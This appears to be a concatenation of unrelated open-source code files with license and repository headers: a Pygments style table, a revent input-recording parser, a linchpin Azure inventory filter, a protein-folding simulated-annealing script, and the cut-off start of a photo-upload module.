corresponding class for the following: #Text: "", # class: '' Whitespace: "underline #f8f8f8", # class: 'w' Error: "#a40000 border:#ef2929", # class: 'err' Other: "#000000", # class 'x' Comment: "italic #8f5902", # class: 'c' Comment.Multiline: "italic #8f5902", # class: 'cm' Comment.Preproc: "italic #8f5902", # class: 'cp' Comment.Single: "italic #8f5902", # class: 'c1' Comment.Special: "italic #8f5902", # class: 'cs' Keyword: "bold #204a87", # class: 'k' Keyword.Constant: "bold #204a87", # class: 'kc' Keyword.Declaration: "bold #204a87", # class: 'kd' Keyword.Namespace: "bold #204a87", # class: 'kn' Keyword.Pseudo: "bold #204a87", # class: 'kp' Keyword.Reserved: "bold #204a87", # class: 'kr' Keyword.Type: "bold #204a87", # class: 'kt' Operator: "bold #ce5c00", # class: 'o' Operator.Word: "bold #204a87", # class: 'ow' - like keywords Punctuation: "bold #000000", # class: 'p' # because special names such as Name.Class, Name.Function, etc. # are not recognized as such later in the parsing, we choose them # to look the same as ordinary variables. Name: "#000000", # class: 'n' Name.Attribute: "#c4a000", # class: 'na' - to be revised Name.Builtin: "#204a87", # class: 'nb' Name.Builtin.Pseudo: "#3465a4", # class: 'bp' Name.Class: "#000000", # class: 'nc' - to be revised Name.Constant: "#000000", # class: 'no' - to be revised Name.Decorator: "bold #5c35cc", # class: 'nd' - to be revised Name.Entity: "#ce5c00", # class: 'ni' Name.Exception: "bold #cc0000", # class: 'ne' Name.Function: "#000000", # class: 'nf' Name.Property: "#000000", # class: 'py' Name.Label: "#f57900", # class: 'nl' Name.Namespace: "#000000", # class: 'nn' - to be revised Name.Other: "#000000", # class: 'nx' Name.Tag: "bold #204a87", # class: 'nt' - like a keyword Name.Variable: "#000000", # class: 'nv' - to be revised Name.Variable.Class: "#000000", # class: 'vc' - to be revised Name.Variable.Global: "#000000", # class: 'vg' - to be revised Name.Variable.Instance: "#000000", # class: 'vi' - to be revised # since the tango light blue does not show up well in text, we choose # a pure blue instead. Number: "bold #0000cf", # class: 'm' Number.Float: "bold #0000cf", # class: 'mf' Number.Hex: "bold #0000cf", # class: 'mh' Number.Integer: "bold #0000cf", # class: 'mi' Number.Integer.Long: "bold #0000cf", # class: 'il' Number.Oct: "bold #0000cf", # class: 'mo' Literal: "#000000", # class: 'l' Literal.Date: "#000000", # class: 'ld' String: "#4e9a06", # class: 's' String.Backtick: "#4e9a06", # class: 'sb' String.Char: "#4e9a06", # class: 'sc' String.Doc: "italic #8f5902", # class: 'sd' - like a comment String.Double: "#4e9a06", # class: 's2' String.Escape: "#4e9a06", # class: 'se' String.Heredoc: "#4e9a06", # class: 'sh' String.Interpol: "#4e9a06", # class: 'si' String.Other: "#4e9a06", # class: 'sx' String.Regex: "#4e9a06", # class: 'sr' String.Single: "#4e9a06", # class: 's1' String.Symbol: "#4e9a06", # class: 'ss' Generic: "#000000", # class: 'g' Generic.Deleted: "#a40000", # class: 'gd' Generic.Emph: "italic #000000", # class: 'ge' Generic.Error: "#ef2929", # class: 'gr' Generic.Heading: "bold #000080", # class: 'gh' Generic.Inserted: "#00A000", # class: 'gi' Generic.Output: "italic #000000", # class: 'go' Generic.Prompt: "#8f5902", # class: 'gp' Generic.Strong: "bold #000000", # class: 'gs' Generic.Subheading: "bold #800080", # class: 'gu' Generic.Traceback: "bold #a40000", # class: 'gt' }
gpl-2.0
lisatn/workload-automation
wa/utils/revent.py
2
10678
# Copyright 2016-2018 ARM Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import struct import signal from datetime import datetime from collections import namedtuple from devlib.utils.misc import memoized from wa.framework.resource import Executable, NO_ONE, ResourceResolver from wa.utils.exec_control import once_per_class GENERAL_MODE = 0 GAMEPAD_MODE = 1 u16_struct = struct.Struct('<H') u32_struct = struct.Struct('<I') u64_struct = struct.Struct('<Q') # See revent section in WA documentation for the detailed description of # the recording format. header_one_struct = struct.Struct('<6sH') header_two_struct = struct.Struct('<H6x') # version 2 onwards devid_struct = struct.Struct('<4H') devinfo_struct = struct.Struct('<4s96s96s96sI') absinfo_struct = struct.Struct('<7i') event_struct = struct.Struct('<HqqHHi') old_event_struct = struct.Struct("<i4xqqHHi") # prior to version 2 def read_struct(fh, struct_spec): data = fh.read(struct_spec.size) return struct_spec.unpack(data) def read_string(fh): length, = read_struct(fh, u32_struct) str_struct = struct.Struct('<{}s'.format(length)) return read_struct(fh, str_struct)[0] def count_bits(bitarr): return sum(bin(b).count('1') for b in bitarr) def is_set(bitarr, bit): byte = bit // 8 bytebit = bit % 8 return bitarr[byte] & bytebit absinfo = namedtuple('absinfo', 'ev_code value min max fuzz flat resolution') class UinputDeviceInfo(object): def __init__(self, fh): parts = read_struct(fh, devid_struct) self.bustype = parts[0] self.vendor = parts[1] self.product = parts[2] self.version = parts[3] self.name = read_string(fh) parts = read_struct(fh, devinfo_struct) self.ev_bits = bytearray(parts[0]) self.key_bits = bytearray(parts[1]) self.rel_bits = bytearray(parts[2]) self.abs_bits = bytearray(parts[3]) self.num_absinfo = parts[4] self.absinfo = [absinfo(*read_struct(fh, absinfo_struct)) for _ in range(self.num_absinfo)] def __str__(self): return 'UInputInfo({})'.format(self.__dict__) class ReventEvent(object): def __init__(self, fh, legacy=False): if not legacy: dev_id, ts_sec, ts_usec, type_, code, value = read_struct(fh, event_struct) else: dev_id, ts_sec, ts_usec, type_, code, value = read_struct(fh, old_event_struct) self.device_id = dev_id self.time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000) self.type = type_ self.code = code self.value = value def __str__(self): return 'InputEvent({})'.format(self.__dict__) class ReventRecording(object): """ Represents a parsed revent recording. This contains input events and device descriptions recorded by revent. Two parsing modes are supported. By default, the recording will be parsed in the "streaming" mode. In this mode, initial headers and device descritions are parsed on creation and an open file handle to the recording is saved. Events will be read from the file as they are being iterated over. In this mode, the entire recording is never loaded into memory at once. The underlying file may be "released" by calling ``close`` on the recroding, after which further iteration over the events will not be possible (but would still be possible to access the file description and header information). The alternative is to load the entire recording on creation (in which case the file handle will be closed once the recroding is loaded). This can be enabled by specifying ``streaming=False``. This will make it faster to subsequently iterate over the events, and also will not "hold" the file open. .. note:: When starting a new iteration over the events in streaming mode, the postion in the open file will be automatically reset to the beginning of the event stream. This means it's possible to iterate over the events multiple times without having to re-open the recording, however it is not possible to do so in parallel. If parallel iteration is required, streaming should be disabled. """ @property def duration(self): if self._duration is None: if self.stream: events = self._iter_events() try: first = last = next(events) except StopIteration: self._duration = 0 for last in events: pass self._duration = (last.time - first.time).total_seconds() else: # not streaming if not self._events: self._duration = 0 self._duration = (self._events[-1].time - self._events[0].time).total_seconds() return self._duration @property def events(self): if self.stream: return self._iter_events() else: return self._events def __init__(self, f, stream=True): self.device_paths = [] self.gamepad_device = None self.num_events = None self.stream = stream self._events = None self._close_when_done = False self._events_start = None self._duration = None if hasattr(f, 'name'): # file-like object self.filepath = f.name self.fh = f else: # path to file self.filepath = f self.fh = open(self.filepath, 'rb') if not self.stream: self._close_when_done = True try: self._parse_header_and_devices(self.fh) self._events_start = self.fh.tell() if not self.stream: self._events = [e for e in self._iter_events()] finally: if self._close_when_done: self.close() def close(self): if self.fh is not None: self.fh.close() self.fh = None self._events_start = None def _parse_header_and_devices(self, fh): magic, version = read_struct(fh, header_one_struct) if magic != b'REVENT': msg = '{} does not appear to be an revent recording' raise ValueError(msg.format(self.filepath)) self.version = version if 3 >= self.version >= 2: self.mode, = read_struct(fh, header_two_struct) if self.mode == GENERAL_MODE: self._read_devices(fh) elif self.mode == GAMEPAD_MODE: self._read_gamepad_info(fh) else: raise ValueError('Unexpected recording mode: {}'.format(self.mode)) self.num_events, = read_struct(fh, u64_struct) if self.version > 2: ts_sec = read_struct(fh, u64_struct)[0] ts_usec = read_struct(fh, u64_struct)[0] self.start_time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000) ts_sec = read_struct(fh, u64_struct)[0] ts_usec = read_struct(fh, u64_struct)[0] self.end_time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000) elif 2 > self.version >= 0: self.mode = GENERAL_MODE self._read_devices(fh) else: raise ValueError('Invalid recording version: {}'.format(self.version)) def _read_devices(self, fh): num_devices, = read_struct(fh, u32_struct) for _ in range(num_devices): self.device_paths.append(read_string(fh)) def _read_gamepad_info(self, fh): self.gamepad_device = UinputDeviceInfo(fh) self.device_paths.append('[GAMEPAD]') def _iter_events(self): if self.fh is None: msg = 'Attempting to iterate over events of a closed recording' raise RuntimeError(msg) self.fh.seek(self._events_start) if self.version >= 2: for _ in range(self.num_events): yield ReventEvent(self.fh) else: file_size = os.path.getsize(self.filepath) while self.fh.tell() < file_size: yield ReventEvent(self.fh, legacy=True) def __iter__(self): for event in self.events: yield event def __enter__(self): return self def __exit__(self, *args): self.close() def __del__(self): self.close() def get_revent_binary(abi): resolver = ResourceResolver() resolver.load() resource = Executable(NO_ONE, abi, 'revent') return resolver.get(resource) class ReventRecorder(object): # Share location of target excutable across all instances target_executable = None def __init__(self, target): self.target = target if not ReventRecorder.target_executable: ReventRecorder.target_executable = self._get_target_path(self.target) @once_per_class def deploy(self): if not ReventRecorder.target_executable: ReventRecorder.target_executable = self.target.get_installed('revent') host_executable = get_revent_binary(self.target.abi) ReventRecorder.target_executable = self.target.install(host_executable) @once_per_class def remove(self): if ReventRecorder.target_executable: self.target.uninstall('revent') def start_record(self, revent_file): command = '{} record -s {}'.format(ReventRecorder.target_executable, revent_file) self.target.kick_off(command, self.target.is_rooted) def stop_record(self): self.target.killall('revent', signal.SIGINT, as_root=self.target.is_rooted) def replay(self, revent_file, timeout=None): self.target.killall('revent') command = "{} replay {}".format(ReventRecorder.target_executable, revent_file) self.target.execute(command, timeout=timeout) @memoized @staticmethod def _get_target_path(target): return target.get_installed('revent')
apache-2.0
CentOS-PaaS-SIG/linchpin
linchpin/provision/roles/azure/files/inventory.py
3
1647
from __future__ import absolute_import from collections import OrderedDict from linchpin.InventoryFilters.InventoryFilter import InventoryFilter class Inventory(InventoryFilter): # DEFAULT_HOSTNAMES = ['public_dns_name', 'public_ip', 'private_ip'] def get_host_data(self, res, cfgs): """ Returns a dict of hostnames or IP addresses for use in an Ansible inventory file, based on available data. Only a single hostname or IP address will be returned per instance, so as to avoid duplicate runs of Ansible on the same host via the generated inventory file. Each hostname contains mappings of any variable that was defined in the cfgs section of the PinFile (e.g. __IP__) to the value in the field that corresponds with that variable in the cfgs. :param topo: linchpin Azure VM resource data :param cfgs: map of config options from PinFile """ host_data = OrderedDict() if res['resource_group'] != 'azure'or res['role'] != 'azure_vm': return host_data var_data = cfgs.get('azure', {}) if var_data is None: var_data = {} networks = res['properties']['networkProfile']['networkInterfaces'] for network in networks: mid = network['properties']['ipConfigurations'][0] # mid: this is a middle variable for flake test ip = mid['properties']['publicIPAddress']['properties']['ipAddress'] host_data[ip] = {"__IP__": ip} self.set_config_values(host_data[ip], res, var_data) return host_data
gpl-3.0
MizzouCMMSGroup1/TFPyModeller
src/sa_v3.py
1
20979
'''current test sequence''' INPUT_SEQUENCE = '' '''fragment database''' DATABASE_NAME_NINE = 'fragment_database/17K_PDB_nine_sequences.db' DATABASE_NAME_THREE = 'fragment_database/17K_PDB_three_sequences.db' '''store working files in temp_out''' TMP_DIR = "temp_out/" #TESTING_SIGMOID = True TESTING_SIGMOID = False '''store working files in temp_out subdirectory/start of each file''' PDB_PREPEND_NAME9 = TMP_DIR+"simulation_9_" PDB_PREPEND_NAME3 = TMP_DIR+"simulation_3_" '''number of hill climbing simulations to run''' NUMBER_SIMULATIONS = 3 #some imports we need import os import subprocess import random import math import copy import argparse #blosum62 from blosum62 import Blosum62 blosum = Blosum62() bmatrix = blosum.matrix #keep track of our db import sqlite3 conn9 = sqlite3.connect(DATABASE_NAME_NINE) conn9.row_factory = sqlite3.Row cursor9 = conn9.cursor() conn3 = sqlite3.connect(DATABASE_NAME_THREE) conn3.row_factory = sqlite3.Row cursor3 = conn3.cursor() #utility functions def phipsi_file_name9(phipsi_number): '''return phipsi/lipa file name for input number''' return PDB_PREPEND_NAME9 + str(phipsi_number) +".txt" def pdb_lipa_name9(pdb_number): '''return PDB file name for input number''' return PDB_PREPEND_NAME9 + "lipa_" + str(pdb_number) +".pdb" def phipsi_file_name3(phipsi_number): '''return phipsi/lipa file name for input number''' return PDB_PREPEND_NAME3 + str(phipsi_number) +".txt" def pdb_lipa_name3(pdb_number): '''return PDB file name for input number''' return PDB_PREPEND_NAME3 + "lipa_" + str(pdb_number) +".pdb" def stats_save_name(): return TMP_DIR+"stats" +".txt" def stats_append(sequence_count,trial_number,score): '''add data to stats file''' STATS_OUT = stats_save_name() file = open(STATS_OUT, "a") file.write("{0}, {1}, {2}\n".format(sequence_count, trial_number, score)) file.close() #code for initialization of protein randomly from sequence database def phipsi_append(phipsi_number, acid, phi, psi): '''add data to phipsi file''' PHIPSI_OUT = phipsi_file_name9(phipsi_number) file = open(PHIPSI_OUT, "a") file.write("{0} {1:5} {2:5}\n".format(acid, phi, psi)) file.close() def append_sequence(pdb_number, a,b,c, d,e,f, g,h,i, skip_sequences=0): '''find sequence from database for each chunk of three residues, add to phipsi file''' #sequence = a+b+c+d+e+f+g+h+i #print sequence base_sequence = [a,b,c,d,e,f,g,h,i] sequence = copy.copy(base_sequence) #print sequence cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % ''.join(sequence)) data = cursor9.fetchone() j = 0 k = 0 while data == None: query = ''.join(sequence) cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % (query)) data = cursor9.fetchone() if data == None: sequence = copy.copy(base_sequence) sequence[j%9] = bmatrix[base_sequence[j%9]][0][0] if j%9 == 0 and j > 0: base_sequence[k%9] = bmatrix[base_sequence[k%9]][0][0] k = k+1 print("no match found. using",''.join(sequence),"instead") j += 1 if j > 17: # after three cycles we're too far away from the original sequence #need a better LIKE clause here (BLOSUM scores?) cursor9.execute("SELECT * FROM sequences WHERE seq LIKE '%s_______%s' ORDER BY RANDOM() LIMIT 1;" % (a, i)) data = cursor9.fetchone() if data == None: "WARNING: no replacement found!" exit() print "couldn't find sequence:", sequence, "using replacement:", data["seq"] #using modular arithmetic to only update the last few residues when needed if skip_sequences<1: phipsi_append(pdb_number,a,data["acid_a_phi"],data["acid_a_psi"]) if skip_sequences<2: phipsi_append(pdb_number,b,data["acid_b_phi"],data["acid_b_psi"]) if skip_sequences<3: phipsi_append(pdb_number,c,data["acid_c_phi"],data["acid_c_psi"]) if skip_sequences<4: phipsi_append(pdb_number,d,data["acid_d_phi"],data["acid_d_psi"]) if skip_sequences<5: phipsi_append(pdb_number,e,data["acid_e_phi"],data["acid_e_psi"]) if skip_sequences<6: phipsi_append(pdb_number,f,data["acid_f_phi"],data["acid_f_psi"]) if skip_sequences<7: phipsi_append(pdb_number,g,data["acid_g_phi"],data["acid_g_psi"]) if skip_sequences<8: phipsi_append(pdb_number,h,data["acid_h_phi"],data["acid_h_psi"]) if skip_sequences<9: phipsi_append(pdb_number,i,data["acid_i_phi"],data["acid_i_psi"]) def build_model(pdb_number): '''build initial model for each chunk of three residues''' sequence_length = len(INPUT_SEQUENCE) i = 0 while i<sequence_length-8: append_sequence(pdb_number, INPUT_SEQUENCE[i], INPUT_SEQUENCE[i+1], INPUT_SEQUENCE[i+2], INPUT_SEQUENCE[i+3], INPUT_SEQUENCE[i+4], INPUT_SEQUENCE[i+5], INPUT_SEQUENCE[i+6], INPUT_SEQUENCE[i+7], INPUT_SEQUENCE[i+8] ) i+=9 #return #some code to deal with last one/two acids if (sequence_length%9>0): append_sequence(pdb_number, INPUT_SEQUENCE[sequence_length-9], INPUT_SEQUENCE[sequence_length-8], INPUT_SEQUENCE[sequence_length-7], INPUT_SEQUENCE[sequence_length-6], INPUT_SEQUENCE[sequence_length-5], INPUT_SEQUENCE[sequence_length-4], INPUT_SEQUENCE[sequence_length-3], INPUT_SEQUENCE[sequence_length-2], INPUT_SEQUENCE[sequence_length-1], 9-sequence_length%9) #code for randomly replacing protein sub-sequences (from sequence database) def phipsi_replace9(old_model_number, new_model_number, a, a_phi, a_psi, b, b_phi, b_psi, c, c_phi, c_psi, d, d_phi, d_psi, e, e_phi, e_psi, f, f_phi, f_psi, g, g_phi, g_psi, h, h_phi, h_psi, i, i_phi, i_psi, sequence_offset=-1): '''copy over old phipsi file to new one and add new sequence data''' if (sequence_offset<0): print "bad things happened" exit() else: print "seq offset:", sequence_offset, "old model:", old_model_number, "new model:", new_model_number PHIPSI_IN = phipsi_file_name9(old_model_number) PHIPSI_OUT = phipsi_file_name9(new_model_number) lines = [line.strip() for line in open(PHIPSI_IN)] a_out = "{0} {1:5} {2:5}\n".format(a, a_phi, a_psi) b_out = "{0} {1:5} {2:5}\n".format(b, b_phi, b_psi) c_out = "{0} {1:5} {2:5}\n".format(c, c_phi, c_psi) d_out = "{0} {1:5} {2:5}\n".format(d, d_phi, d_psi) e_out = "{0} {1:5} {2:5}\n".format(e, e_phi, e_psi) f_out = "{0} {1:5} {2:5}\n".format(f, f_phi, f_psi) g_out = "{0} {1:5} {2:5}\n".format(g, g_phi, g_psi) h_out = "{0} {1:5} {2:5}\n".format(h, h_phi, h_psi) i_out = "{0} {1:5} {2:5}\n".format(i, i_phi, i_psi) out_file = open(PHIPSI_OUT, "a") i = 0 numlines = len(lines) while i < sequence_offset: out_file.write(lines[i]+"\n") i+=1 out_file.write(a_out) out_file.write(b_out) out_file.write(c_out) out_file.write(d_out) out_file.write(e_out) out_file.write(f_out) out_file.write(g_out) out_file.write(h_out) out_file.write(i_out) i+=9 while i < numlines: out_file.write(lines[i]+"\n") i+=1 out_file.close() def replace_sequence9(old_model_number, new_model_number, a,b,c, d,e,f, g,h,i, sequence_offset=-1): '''find a new replacement sequence for an input''' if (sequence_offset<0): print "bad things happened" exit() #sequence = a+b+c+d+e+f+g+h+i #print sequence base_sequence = [a,b,c,d,e,f,g,h,i] sequence = copy.copy(base_sequence) #print sequence cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % ''.join(sequence)) data = cursor9.fetchone() j = 0 k = 0 while data == None: query = ''.join(sequence) cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % (query)) data = cursor9.fetchone() if data == None: sequence = copy.copy(base_sequence) sequence[j%9] = bmatrix[base_sequence[j%9]][0][0] if j%9 == 0 and j > 0: base_sequence[k%9] = bmatrix[base_sequence[k%9]][0][0] k = k+1 print("no match found. using",''.join(sequence),"instead") j += 1 if j > 17: # after three cycles we're too far away from the original sequence #need a better LIKE clause here (BLOSUM scores?) cursor9.execute("SELECT * FROM sequences WHERE seq LIKE '%s_______%s' ORDER BY RANDOM() LIMIT 1;" % (a, i)) data = cursor9.fetchone() if data == None: "WARNING: no replacement found!" exit() print "couldn't find sequence:", sequence, "using replacement:", data["seq"] #print "skipping search" #return phipsi_replace9(old_model_number, new_model_number,a,data["acid_a_phi"],data["acid_a_psi"], b,data["acid_b_phi"],data["acid_b_psi"], c,data["acid_c_phi"],data["acid_c_psi"], d,data["acid_d_phi"],data["acid_d_psi"], e,data["acid_e_phi"],data["acid_e_psi"], f,data["acid_f_phi"],data["acid_f_psi"], g,data["acid_g_phi"],data["acid_g_psi"], h,data["acid_h_phi"],data["acid_h_psi"], i,data["acid_i_phi"],data["acid_i_psi"], sequence_offset) def randomize_model9(old_model_number, new_model_number): '''pick three residues at random and replace them''' sequence_length = len(INPUT_SEQUENCE) random_offset = random.randint(0,sequence_length-9) #can't select beyond last residue replace_sequence9(old_model_number, new_model_number, INPUT_SEQUENCE[random_offset], INPUT_SEQUENCE[random_offset+1], INPUT_SEQUENCE[random_offset+2], INPUT_SEQUENCE[random_offset+3], INPUT_SEQUENCE[random_offset+4], INPUT_SEQUENCE[random_offset+5], INPUT_SEQUENCE[random_offset+6], INPUT_SEQUENCE[random_offset+7], INPUT_SEQUENCE[random_offset+8], random_offset) #code for randomly replacing protein sub-sequences (from sequence database) def phipsi_replace3(old_model_number, new_model_number, a, a_phi, a_psi, b, b_phi, b_psi, c, c_phi, c_psi, sequence_offset=-1): '''copy over old phipsi file to new one and add new sequence data''' if (sequence_offset<0): print "bad things happened" exit() else: print "seq offset:", sequence_offset, "old model:", old_model_number, "new model:", new_model_number PHIPSI_IN = phipsi_file_name3(old_model_number) PHIPSI_OUT = phipsi_file_name3(new_model_number) lines = [line.strip() for line in open(PHIPSI_IN)] a_out = "{0} {1:5} {2:5}\n".format(a, a_phi, a_psi) b_out = "{0} {1:5} {2:5}\n".format(b, b_phi, b_psi) c_out = "{0} {1:5} {2:5}\n".format(c, c_phi, c_psi) out_file = open(PHIPSI_OUT, "a") i = 0 numlines = len(lines) while i < sequence_offset: out_file.write(lines[i]+"\n") i+=1 out_file.write(a_out) out_file.write(b_out) out_file.write(c_out) i+=3 while i < numlines: out_file.write(lines[i]+"\n") i+=1 out_file.close() def replace_sequence3(old_model_number, new_model_number, a,b,c, sequence_offset=-1): '''find a new replacement sequence for an input''' if (sequence_offset<0): print "bad things happened" exit() sequence = a+b+c #print sequence cursor3.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % sequence) data = cursor3.fetchone() if data == None: #need a better LIKE clause here (BLOSUM scores?) cursor3.execute("SELECT * FROM sequences WHERE seq LIKE '%s_%s' ORDER BY RANDOM() LIMIT 1;" % (a, c)) data = cursor3.fetchone() if data == None: "WARNING: no replacement found!" exit() return print "couldn't find sequence:", sequence, "using replacement:", data["seq"] phipsi_replace3(old_model_number, new_model_number,a,data["acid_a_phi"],data["acid_a_psi"],b,data["acid_b_phi"],data["acid_b_psi"],c,data["acid_c_phi"],data["acid_c_psi"], sequence_offset) def randomize_model3(old_model_number, new_model_number): '''pick three residues at random and replace them''' sequence_length = len(INPUT_SEQUENCE) random_offset = random.randint(0,sequence_length-3) #can't select beyond last residue replace_sequence3(old_model_number, new_model_number, INPUT_SEQUENCE[random_offset], INPUT_SEQUENCE[random_offset+1], INPUT_SEQUENCE[random_offset+2], random_offset) #global utility function to build/score pdb file def build_score_pdb_model9(pdb_number): '''send phipsi to lipa to generated pdb, score with dfire, return score (most negative == best)''' PDB_OUT = phipsi_file_name9(pdb_number) PDB_OUT_LIPA = pdb_lipa_name9(pdb_number) lipa_convert = os.system("./lipa " + PDB_OUT + " -o " + PDB_OUT_LIPA) dfire_output = subprocess.check_output("./dDFIRE " + PDB_OUT_LIPA, shell=True) dfire_output_split = dfire_output.split(":") dfire_output_split_nums = dfire_output_split[1].split(" ") print "pdb:", PDB_OUT_LIPA, "dfire_score:", float(dfire_output_split_nums[1]) return float(dfire_output_split_nums[1]) #global utility function to build/score pdb file def build_score_pdb_model3(pdb_number): '''send phipsi to lipa to generated pdb, score with dfire, return score (most negative == best)''' PDB_OUT = phipsi_file_name3(pdb_number) PDB_OUT_LIPA = pdb_lipa_name3(pdb_number) lipa_convert = os.system("./lipa " + PDB_OUT + " -o " + PDB_OUT_LIPA) dfire_output = subprocess.check_output("./dDFIRE " + PDB_OUT_LIPA, shell=True) dfire_output_split = dfire_output.split(":") dfire_output_split_nums = dfire_output_split[1].split(" ") print "pdb:", PDB_OUT_LIPA, "dfire_score:", float(dfire_output_split_nums[1]) return float(dfire_output_split_nums[1]) #temperature calculator. non-linear decrease def sigmoid_temperature(k): return -5000/(1 + math.exp(-k/200)) + 5000 def linear_temperature(k): return (-2500/1000)*k + 2500 #init and run hill climbing, print out results def main(): global TESTING_SIGMOID global INPUT_SEQUENCE global TMP_DIR global PDB_PREPEND_NAME9 global PDB_PREPEND_NAME3 parser = argparse.ArgumentParser(description="Runner for TFPyModeller") parser.add_argument('-t','--target', help='target name to use',type=int,default='0') parser.add_argument('-d','--decoys', help='simulation id',type=int,default=0) t_group = parser.add_mutually_exclusive_group() t_group.add_argument('-l','--linear',action='store_false') t_group.add_argument('-s','--sigmoid',action='store_true') parser.add_argument('-k','--sequence',help='sequence to run') args = parser.parse_args() target = args.target simulation_id = args.decoys temperature = 'sigmoid' if args.sigmoid: TESTING_SIGMOID = True if target == 0: INPUT_SEQUENCE = 'MLGLVLLYVGIVLISNGICGLTKVDPKSTAVMNFFVGGLSIVCNVVVITYSALHPTAPVEGAEDIVQVSHHLTSFYGPATGLLFGFTYLYAAINHTFGLDWRPYSWYSLFVAINTVPAAILSHYSDMLDDHKVLGITEGDWWAIIWLAWGVLWLTAFIENILKIPLGKFTPWLAIIEGILTAWIPAWLLFIQHWV' if TESTING_SIGMOID: TMP_DIR = "T0666_sigmoid_1k/" else: TMP_DIR = "T0666_linear_1k/" if target == 1: INPUT_SEQUENCE = 'KIYAEIDRLESWKIEILNRSIVEEMSKIKHLKMTGQTEEFFEKWREEWDEIVTAHMPKVEELLYDAEENADKYRFKKANQVLVHIDDLLTAAESSIEKILREISDLVTSEEKSREEIEQVRERYSKSRKNLLAYSHLYGELYDSLEKDLDEIWSGIKQFEEETEGGNYITARKVLLEQDRNLERLQSYIDDVPKLLADCKQTVPGQIAKLKDGYGEMKEKGYKLEHIQLDKELENLSNQLKRAEHVLMTELDIDEASAILQLIDENIQSVYQQLEGEVEAGQSVLSKMPELIIAYDKLKEEKEHTKAETELVKESYRLTAGELGKQQAFEKRLDEIGKLLSSVKDKLDAEHVAYSLLVEEVASIEKQIEEVKKEHAEYRENLQALRKEELQARETLSNLKKTISETARLLKTSNIPGIPSHIQEMLENAHHHIQETVNQLNELPLNMEEAGAHLKQAEDIVNRASRESEELVEQVILIEKIIQFGNRFRSQNHILSEQLKEAERRFYAFDYDDSYEIAAAAVEKAAPGAVEKIKAD' if TESTING_SIGMOID: TMP_DIR = "T0695_sigmoid_1k/" else: TMP_DIR = "T0695_linear_1k/" if target == 2: INPUT_SEQUENCE = 'MIDLAPLVRRLAGTPLAEWANGLQAQLDTKMSKGHGDLQRWQSALDALPALQPEKVDLTDSFTLETECDGETRTVLRKALLGLSPWRKGPFNVFGVHIDT' if TESTING_SIGMOID: TMP_DIR = "T0693_sigmoid_1k/" else: TMP_DIR = "T0693_linear_1k/" PDB_PREPEND_NAME9 = TMP_DIR+"simulation_9_" PDB_PREPEND_NAME3 = TMP_DIR+"simulation_3_" #cleanup if not os.path.exists(TMP_DIR): print("Making temp directory") os.mkdir(TMP_DIR) else: print("Clearing temp directory") for root,dirs,files in os.walk(TMP_DIR,topdown=False): for name in files: os.remove(os.path.join(root,name)) ''' #cleanup for i in range(1,NUMBER_SIMULATIONS+1): if os.path.exists(phipsi_file_name(i)): os.rm() os.system("rm " + phipsi_file_name(i)) os.system("rm " + pdb_lipa_name(i)) ''' #build initial random model build_model(0) best_dfire_score = 1e6 #best is lowest best_dfire_number = -1 old_model_number = 0 #test models #model 0 is the initial sequence for i in range(1,NUMBER_SIMULATIONS+1,1): T = 0 if TESTING_SIGMOID: T = sigmoid_temperature(i) else: T = linear_temperature(i) randomize_model9(old_model_number, i) i_score = build_score_pdb_model9(i) stats_append(9,i,i_score) score_diff = i_score - best_dfire_score if score_diff > 0: #print("score diff", score_diff) score_diff = score_diff if score_diff < 5*T else 5*T prob_to_accept = math.exp(-100*score_diff/T) print("probability to accept:", prob_to_accept) if prob_to_accept < random.random(): #print("probability not enough") continue print("accepting some randomness") #print("scoring") #if i_score < best_dfire_score: best_dfire_score = i_score best_dfire_number = i old_model_number = i #save best stats_append(9000,best_dfire_number,best_dfire_score) best_model = best_dfire_number #convert best nine model to three to start model refinement print (phipsi_file_name9(best_model)) print (phipsi_file_name3(0)) os.system("cp " + phipsi_file_name9(best_model) + " " + phipsi_file_name3(0)) best_model = 0 best_dfire_score = 1e6 for i in range(1,NUMBER_SIMULATIONS+1,1): T = 0 if TESTING_SIGMOID: T = sigmoid_temperature(i) else: T = linear_temperature(i) randomize_model3(best_model, i) i_score = build_score_pdb_model3(i) stats_append(3,i,i_score) score_diff = i_score - best_dfire_score if score_diff > 0: #print("score diff", score_diff) score_diff = score_diff if score_diff < 5*T else 5*T prob_to_accept = math.exp(-100*score_diff/T) print("probability to accept:", prob_to_accept) if prob_to_accept < random.random(): #print("probability not enough") continue print("accepting some randomness") #print("scoring") #if i_score < best_dfire_score: best_dfire_score = i_score best_dfire_number = i old_model_number = i #save best stats_append(3000,best_dfire_number,best_dfire_score) print "best model found:", best_dfire_number, "score:", best_dfire_score if __name__ == "__main__": main()
gpl-2.0
eikevons/yorik-photos
photos/upload.py
1
5164
## ## Copyright (c) 2014 Jan Eike von Seggern ## import os from os import path from shutil import copyfileobj, move, rmtree from multiprocessing.dummy import Pool from io import IOBase from hashlib import md5 from datetime import datetime from PIL import Image from . import photo_storage from .application import app thumb_width = int(app.config['THUMB_WIDTH']) def md5hex(fd, block_size=2**10): dig = md5() buf = fd.read(block_size) while buf: dig.update(buf) buf = fd.read(block_size) return dig.hexdigest() def prepare_photo(outdir, thumbdir, fin, filename): print('loading', filename, 'to', outdir, 'from', fin) fin.seek(0) chksum = md5hex(fin) impath = path.join(outdir, chksum) if path.exists(impath): raise IOError("Output file '{0}' already exists".format(impath)) thumbpath = path.join(thumbdir, chksum) if path.exists(thumbpath): raise IOError("Thumbnail file '{0}' already exists".format(impath)) print(filename, 'files ok') # Copy image to `outdir` fin.seek(0) with open(impath, 'wb') as fout: copyfileobj(fin, fout) print(filename, 'copied') # Get date fin.seek(0) im = Image.open(fin) dt = 